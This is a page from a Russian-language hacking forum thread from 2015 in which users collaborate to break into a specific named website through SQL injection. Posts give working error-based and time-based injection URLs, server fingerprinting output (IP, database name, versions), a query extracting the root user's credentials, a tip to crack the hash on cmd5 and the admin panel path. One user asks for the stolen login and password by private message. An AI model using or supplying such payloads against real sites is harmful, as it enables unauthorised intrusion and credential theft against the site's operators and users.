HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 78 из 296 « Первая < 2868 74 75 76 77 78 79 80 81 82 88128178 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #771  
Старый 25.10.2015, 23:03
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от psihoz26  
psihoz26 said:

Вывод ошибок есть?
да
 
Ответить с цитированием

  #772  
Старый 26.10.2015, 07:44
segodnya
Guest
Сообщений: n/a
Провел на форуме:
2724

Репутация: 0
По умолчанию
нашел SQL инъекцию, попробовал через Havij , не отображает название столбцов баз данных.

скрин-шот: http://i.imgur.com/j2yMOWB.png

Сама инъекция:

Цитата:
Сообщение от None  
Вопрос, что можно сделать.
 
Ответить с цитированием

  #773  
Старый 26.10.2015, 08:38
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:

да
http://www.securitylab.ru/news/470546.php
 
Ответить с цитированием

  #774  
Старый 26.10.2015, 08:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от segodnya  
segodnya said:

Вопрос, что можно сделать.
http://stop-obman.ru/websites.html?...r(extractvalue(1,concat(0x3a,vers ion())))=('1

руками надо
 
Ответить с цитированием

  #775  
Старый 26.10.2015, 08:40
segodnya
Guest
Сообщений: n/a
Провел на форуме:
2724

Репутация: 0
По умолчанию
Цитата:
Сообщение от Konqi  
спасибо, вот только не вижу, что мы вывели данным запросом.

как вывести логин / пароль id1 т.е администратора
 
Ответить с цитированием

  #776  
Старый 26.10.2015, 09:40
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от segodnya  
segodnya said:

спасибо, вот только не вижу, что мы вывели данным запросом.
как не видешь

Цитата:
Сообщение от None  
XPATH syntax error: ':5.1.73'.
Цитата:
Сообщение от segodnya  
segodnya said:
kак вывести логин / пароль id1 т.е администратора
это уже сам
 
Ответить с цитированием

  #777  
Старый 26.10.2015, 10:27
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:

да
https://rdot.org/forum/showpost.php?p=36186&

Тут есть пример эксплуатации
 
Ответить с цитированием

  #778  
Старый 26.10.2015, 13:20
xivi00
Guest
Сообщений: n/a
Провел на форуме:
11341

Репутация: 0
По умолчанию
Цитата:
Сообщение от segodnya  
segodnya said:

спасибо, вот только не вижу, что мы вывели данным запросом.
как вывести логин / пароль id1 т.е администратора
http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'--

Target: http://stop-obman.ru/organizations.html?rid=1

Host IP: 217.12.206.101

Web Server: nginx

Powered-by: PHP/5.3.3

DB Server: MySQL error based

Resp. Time(avg): 889 ms

Sql Version: 5.1.73

Current DB: raferti_stopobman

Host Name: rafer685.vds

Compile OS: redhat-linux-gnu

Installation dir: /usr/
 
Ответить с цитированием

  #779  
Старый 26.10.2015, 14:30
segodnya
Guest
Сообщений: n/a
Провел на форуме:
2724

Репутация: 0
По умолчанию
Цитата:
Сообщение от xivi00  
xivi00 said:

http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'--
Target:
http://stop-obman.ru/organizations.html?rid=1
Host IP: 217.12.206.101
Web Server: nginx
Powered-by: PHP/5.3.3
DB Server: MySQL error based
Resp. Time(avg): 889 ms
Sql Version: 5.1.73
Current DB: raferti_stopobman
Host Name: rafer685.vds
Compile OS: redhat-linux-gnu
Installation dir: /usr/
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.' at line 1. The SQL statement executed was: SELECT COUNT(DISTINCT `t`.`id`) FROM `subject` `t` LEFT OUTER JOIN `organization` `rl_orgs` ON (`rl_orgs`.`subject`=`t`.`id`) WHERE (((((type='1') AND (rl_orgs.region = '1 WAITFOR DELAY '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.enable=1))

если получится, скинь логин/пароль в лс
 
Ответить с цитированием

  #780  
Старый 26.10.2015, 14:48
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от segodnya  
segodnya said:

спасибо, вот только не вижу, что мы вывели данным запросом.
как вывести логин / пароль id1 т.е администратора
А сами не умеете вообще? учитесь.

http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1

пароль есть на cmd5

админка по адресу stop-obman.ru/backend будет
 
Ответить с цитированием
Ответ
Страница 78 из 296 « Первая < 2868 74 75 76 77 78 79 80 81 82 88128178 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ